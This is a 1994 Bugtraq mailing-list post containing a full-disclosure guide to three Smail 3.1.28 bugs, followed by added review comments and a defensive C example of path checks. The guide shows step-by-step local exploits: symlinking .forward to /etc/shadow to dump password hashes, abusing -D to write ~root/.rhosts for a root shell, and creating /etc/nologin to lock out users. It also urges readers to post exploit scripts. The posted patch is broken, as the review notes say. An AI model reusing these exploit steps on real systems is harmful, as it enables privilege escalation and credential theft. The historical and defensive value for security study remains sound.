Date: Sun, 9 Oct 94 00:09:02 PDT
From: xcelsior@altair.csustan.edu (Excelsior)
Message-Id: <9410090709.AA29110@altair.csustan.edu>
To: bugtraq@fc.net
Subject: Re: 3 SMAIL BUGS

aleph1@dfw.net (Aleph One) spewed....

>Ok for all of you asking which are the 3
>here is the count down:
>
>Number 3 - The SMTP DEBUG problem. Anyone can
>           telnet to your SMTP port and read any
>           file on the system.

You are exaggerating the problem. To exploit this, you have to have an
account on the local machine (in order to create the ~/.forward link).
Not just "anyone" can exploit it.

>           Fixed by adding
>           -smtp_debug in your smail config file.

Wrong wrong wrong! All the -smtp_debug flag does is keep you from
exploiting it by telnetting directly to the smtp port. There is an easier
way to exploit it.

>Number 2 - The .forward problem. Another
>           configuration problem. Smail does not
>           check file attributes when delivering mail
                  ^^^^^^^^^^^^^^^
Wrong again. It does check the file attributes, but not the attributes of
the DIRECTORY you are trying to create the file in - thus causing the
problem.

>           to a file pointed to by a .forward.
>           Fixed
>           by adding the check_path attribute to the
>           forward file director.
>
>and
>
>Number 1 - Debug file bug. Smail creates or appends to
>           any file using the debug options!

How about explaining those bugs in detail? If I wanted to hear "There is a
bug" with no explanation, I'd read CERT. Maybe you don't know how the bugs
work, but if you do, don't be a WUSS - post it!

>There. What I said will fix #1 and #2.

Nope, what you said will definitely NOT fix #1 or #3. You can fix #2 as
you described, but you weren't very specific about it, were you?

>           Several different
>           patches have been posted for #3 on usenet. Check
>           comp.mail.smail and the comp.is.linux.* newsgroups.
>           Also the maintainers of smail will fixed RSN.
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Isn't that a little harsh? How about just giving them a course in writing
secure Setuid programs. :)

Ok, now everyone repeat after me:

            BUGTRAQ IS A FULL DISCLOSURE LIST

That's right. FULL disclosure. Since all the elite cracker pussies are too
scared to describe their bugs in detail, I will. I am including a security
doc on smail that I wrote a little while ago. I'm sure most of the cracker
dudes got it from my DocServer and FTP site, so here it comes to the rest
of you. I hope this encourages more people to stop being childish and post
your bugs. I'll be posting more goodies from my archives soon as well.

Share and enjoy.... :)

-------------------------------------------------

EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994

*** Bug #1 ***

SYNOPSIS
--------

Use of ~/.forward and debug lets a local user read any file on the system.

EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> ln -s /etc/shadow .forward
loser@possesux ~> ls -la .forward
lrwxrwxrwx   1 loser    users          11 Sep  5 12:08 .forward -> /etc/shadow
loser@possesux ~> telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost-gw.
Escape character is '^]'.
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 PDT
debug 20
250 Debugging level: 20
expn loser
[lots of crap]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more crap]
read 890 bytes
director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
Connection closed by foreign host.

---------------

Contrary to popular belief, adding -smtp_debug to your smail config file
will NOT prevent this bug from occurring. It will just prevent exploitation
via the smtp port. We can just do this....

----------

loser@possesux ~> smail -bs -v20
expand_string($primary_name Smail$version ready for fakemail on $date,(null), (null)) called
expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
expn loser
[same crap as before]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more of same crap]
read 890 bytes
director dotforward: matched loser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection

----------

The easy way to fix this is to nuke the -d and -v options from smail.
*** Bug #2 ***

SYNOPSIS
--------

Smail called with the -D flag will allow you to create and append to any
file on the system.

EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> cat ~/.forward
localhost loser
^D
loser@possesux ~> smail -bs -D ~root/.rhosts -v20
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 PDT
expn loser
250 loser
quit
221 possesux.warez.mil closing connection
loser@possesux ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)

--------------

Neat, huh? Patch by nuking the -D option from smail. I received the
following patch recently. I haven't tested it, so use at your own risk.

*** Omain.c	Wed Mar 11 12:33:18 1993
--- main.c	Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
  }
- /*
-  * change error file to debugging file from -D option, if any
-  */
-
- if (arg_debug_file) {
- new_errfile = fopen(arg_debug_file, "a");
- if (new_errfile == NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file = NULL;
- } else {
- errfile = new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
- program, (long)getpid());
- }
- }
-
- /*
   * read in the transport, router and director files, if needed
   *
   * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
  if (prog_euid != REQUIRED_EUID)
  queue_only = TRUE;
  #endif
+
+ /*
+  * change error file to debugging file from -D option, if any
+  *
+  * JMJ: Change location of this fragment to below the setuid/setgid
+  * calls to allow for use of fopen_as_user() instead of just
+  * fopen().
+  *
+  * Side effect: -D now requires full pathname to debug file
+  */
+
+ if (arg_debug_file) {
+ new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file = NULL;
+ } else {
+ errfile = new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+ program, (long)getpid());
+ }
+ }
  /*
   * error processing can be other than TERMINAL only for
--

*** Bug #3 ***

SYNOPSIS
--------

Files specified in ~/.forward can be created in any directory, regardless
of its permissions. (File is still owned by mailbox owner, however.)

EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> echo "/etc/nologin" > ~/.forward
loser@possesux ~> mail -r root loser < /dev/null
loser@possesux ~> echo "Site shutdown due to smail lameness" >! /etc/nologin
loser@possesux ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

---------

Plug up this hole by adding 'check_path' to the following part of your
/usr/lib/smail/transports file:

---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,           # file is taken from address
        append_as_user,         # use user-id associated with address
        expand_user,            # expand ~ and $ within address
        check_path,             #<--add this line
        suffix = "\n",
        mode = 0644
[...]
---

That's it for now. If you appreciated reading this file, then consider
posting your exploitation scripts too. Share and enjoy!

- Excelsior
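Review bot: in the first hunk of the main.c patch (*** 436,458 ****), the deleted block as posted ends with `- /*` while the surviving context resumes at ` * read in the transport, router and director files, if needed`, so the comment that introduces the transport/router/director load loses its opening `/*` and the result will not compile; the deletion should stop at the blank line after the closing `}` of the `if (arg_debug_file)` block and leave that `/*` as context. The deletion itself is the right move: this fopen() ran before the setuid/setgid calls, with the program's effective uid, which is exactly what lets `-D ~root/.rhosts` append as root.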
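Review bot: the `if (new_errfile == NULL) {` test is missing from the second hunk (--- 508,537 ----): the line after the fopen_as_user() call goes straight to write_log(), so the warning is logged and arg_debug_file cleared on every run, the `} else {` that follows has no `if` to pair with, and the braces of the hunk do not balance, so this will not compile as posted. Restore the line that the first hunk removed, as `+ if (new_errfile == NULL) {`, between `+ prog_egid, 0600);` and `+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",`. Otherwise the relocation is sound: opening with fopen_as_user(..., real_uid, prog_egid, 0600) below the setuid/setgid calls means the -D file is created and appended with the invoking user's identity, which is what closes Bug #2; the `Side effect: -D now requires full pathname to debug file` remark should also reach the usage text, since a relative -D argument that used to work silently stops working.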
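Added example, not from the original message and not smail's own code: a small C model, in this example's own naming, of the two checks that the fixes in the guide above stand for. check_path_for_user() is what the check_path attribute has to decide for a delivery target (Bug #3, and the -D file of Bug #2 once it is opened as the real user), and check_forward_file() is the refusal to read a ~/.forward that is a symlink, the set-up of Bug #1. The path_verdict enum, both function names and the /tmp fixture built by demo_fixture() are assumptions of this example; uid 65534 below is just an arbitrary unprivileged id.

```c
#define _GNU_SOURCE                 /* lstat, symlink, mkdtemp on glibc */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum path_verdict {
    PATH_OK = 0,
    PATH_NOT_ABSOLUTE,  /* relative path, or nothing after the last slash */
    PATH_NO_SEARCH,     /* a directory on the way is not searchable by the user */
    PATH_NO_WRITE,      /* the containing directory is not writable by the user */
    PATH_SYMLINK,       /* the target, or .forward itself, is a symbolic link */
    PATH_NOT_OWNED,     /* exists but is not a regular file owned by the user */
    PATH_BAD_MODE,      /* .forward is writable by group or others */
    PATH_ERROR          /* stat(2) failed for a reason other than ENOENT */
};

/* rwx test (want: 4=r, 2=w, 1=x) for uid/gid against st, the way the kernel's
 * discretionary check works: owner bits if the uid matches, else group bits if
 * the primary gid matches, else "other" bits.  Supplementary groups are
 * ignored, which can only make the answer stricter. */
static int user_has(const struct stat *st, uid_t uid, gid_t gid, int want)
{
    int bits = (st->st_uid == uid) ? (st->st_mode >> 6)
             : (st->st_gid == gid) ? (st->st_mode >> 3) : st->st_mode;
    return (bits & 7 & want) == want;
}

/* check_path for a delivery target created on behalf of uid/gid: every
 * directory on the way searchable by that user, the last one writable by that
 * user, and an existing target a regular file the user owns, never a symlink.
 * Bits are judged for the supplied ids, not for the calling process, so a root
 * MTA gets the answer the user would get; uid 0 itself bypasses the checks. */
enum path_verdict check_path_for_user(const char *path, uid_t uid, gid_t gid)
{
    char buf[4096], *slash, *q;
    struct stat st;
    size_t len = strlen(path);

    if (path[0] != '/' || len >= sizeof buf)
        return PATH_NOT_ABSOLUTE;
    memcpy(buf, path, len + 1);
    slash = strrchr(buf, '/');                  /* slash before the file name */
    if (slash[1] == '\0') return PATH_NOT_ABSOLUTE;   /* "/etc/" names no file */

    for (q = buf; q <= slash; q++) {
        int rc, need = (q == slash) ? 3 : 1;    /* parent dir: w+x, others: x */
        if (*q != '/') continue;
        *q = '\0';                              /* cut buf at this slash */
        rc = stat(q == buf ? "/" : buf, &st);
        *q = '/';
        if (rc != 0) return PATH_ERROR;
        if (!S_ISDIR(st.st_mode)) return PATH_NO_SEARCH;
        if (uid != 0 && !user_has(&st, uid, gid, need))
            return q == slash ? PATH_NO_WRITE : PATH_NO_SEARCH;
    }
    if (lstat(buf, &st) != 0)                   /* absent: fine, it gets created */
        return errno == ENOENT ? PATH_OK : PATH_ERROR;
    if (S_ISLNK(st.st_mode))
        return PATH_SYMLINK;
    if (!S_ISREG(st.st_mode) || (uid != 0 && st.st_uid != uid))
        return PATH_NOT_OWNED;
    return PATH_OK;
}

/* The reader side of the same rule, for ~/.forward itself: a plain file owned
 * by the user, examined without following a symlink (exactly what
 * "ln -s /etc/shadow .forward" sets up), and writable by nobody else. */
enum path_verdict check_forward_file(const char *path, uid_t uid)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return PATH_ERROR;
    if (S_ISLNK(st.st_mode))
        return PATH_SYMLINK;
    if (!S_ISREG(st.st_mode) || st.st_uid != uid)
        return PATH_NOT_OWNED;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) ? PATH_BAD_MODE : PATH_OK;
}

/* Constructed fixture, not anything smail does: a private 0700 directory under
 * /tmp whose .forward is a symlink to /etc/passwd (a readable stand-in for
 * /etc/shadow).  Returns "<dir>/<name>" in a static buffer, or NULL on failure. */
const char *demo_fixture(const char *name)
{
    static char dir[] = "/tmp/smail-demo-XXXXXX";
    static char path[sizeof dir + 32];
    static int ready;
    if (!ready) {
        if (mkdtemp(dir) == NULL)
            return NULL;
        snprintf(path, sizeof path, "%s/.forward", dir);
        if (symlink("/etc/passwd", path) != 0)
            return NULL;
        ready = 1;
    }
    snprintf(path, sizeof path, "%s/%s", dir, name);
    return path;
}
```

Calling check_forward_file(demo_fixture(".forward"), getuid()) yields PATH_SYMLINK, check_path_for_user("/etc/nologin", 65534, 65534) yields PATH_NO_WRITE (the Bug #3 case, refused because /etc is not writable by that uid), and check_path_for_user(demo_fixture("mbox"), getuid(), getgid()) yields PATH_OK. Both checks are stat()-then-act and therefore race against a user who swaps a path component between the check and the open; they are the policy decision, not a substitute for performing the open with the user's own credentials after the setuid/setgid calls, which is where the main.c patch in the message moves the -D open. Where the platform offers O_NOFOLLOW and fstat(), open first and judge the opened descriptor instead.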